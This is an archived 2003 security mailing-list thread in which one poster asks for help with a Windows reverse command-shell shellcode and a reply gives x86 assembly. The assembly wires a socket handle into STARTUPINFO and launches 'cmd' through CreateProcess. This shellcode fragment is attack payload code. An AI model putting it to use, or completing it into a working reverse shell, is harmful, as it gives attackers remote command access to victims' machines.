Vulnerability Development mailing list archives

Re: Windows reverse Shell

From: "sk" <sk () scan-associates net>
Date: Wed, 5 Feb 2003 00:42:54 +0800

If I remember correctly, that shellcode dont have "bind" function. A reverse
connect shellcode dont need "bind". WSASocket() will return a
non-overlapping socket, so it can be used as in/out/err handler in
CreateProcess(), there is really nothing extra you need to do. Since you got
a connection in your nc, the problem should be in your CreateProcess(). Try
to check if your StartupInfo flags has STARTF_USESTDHANDLES.

I dont have C code for this, but in asm, it could be something like this:

;ebx = socket
xor         ecx,ecx
mov         cl,11h
push        edi
mov         edi,ebp
rep stos    dword ptr [edi] ;zero up startupinfo
pop         edi
mov         byte ptr [ebp],44h     ;STARTUPINFO size
mov         dword ptr [ebp+3Ch],ebx     ;output handler
mov         dword ptr [ebp+38h],ebx     ;input handler
mov         dword ptr [ebp+40h],ebx     ;error handler
mov         word ptr [ebp+2Ch],0101h
;STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW
lea         eax,[ebp+44h]
push        eax
push        ebp
push        ecx
push        ecx
push        ecx
inc         ecx
push        ecx
dec         ecx
push        ecx
push        ecx
push        esi  ;"cmd",0
push        ecx
call        dword ptr [edi-28] ;CreateProcess

sk
----- Original Message -----
From: "NetNinja" <netninja () hotmail kg>
To: <vuln-dev () securityfocus com>
Sent: Tuesday, February 04, 2003 3:37 AM
Subject: Windows reverse Shell

Hello guys,

David Litchfield in his Blackhat talk, talked about using socket handle
from WSASocket() and pass that handle as a parameter to stdin, stdout
and stderr for CreateProcess function. By doin this way his reverse
cmd shellcode becomes much smaller. I tried coding that reverse
command shell in C, but couldnt get it to work. It simply connects to
my listening netcat listener and then disconnects. David Litchfield
used 4 functions to achieva that WSASocket, bind, connect and
CreateProcess. A lil help would b appreciated on building this reverse
cmd shell. thanx.


--
Best regards,
 Adik                         mailto:netninja () hotmail kg

Current thread:

Windows reverse Shell NetNinja (Feb 03)
- Re: Windows reverse Shell 3APA3A (Feb 05)
  - Re[2]: Windows reverse Shell Adik (Feb 05)
  - Re[2]: Windows reverse Shell 3APA3A (Feb 05)
- Re: Windows reverse Shell sk (Feb 05)
- <Possible follow-ups>
- Re: Windows reverse Shell Ali Saifullah Khan (Feb 05)
- Re: Windows reverse Shell Berend-Jan Wever (Feb 05)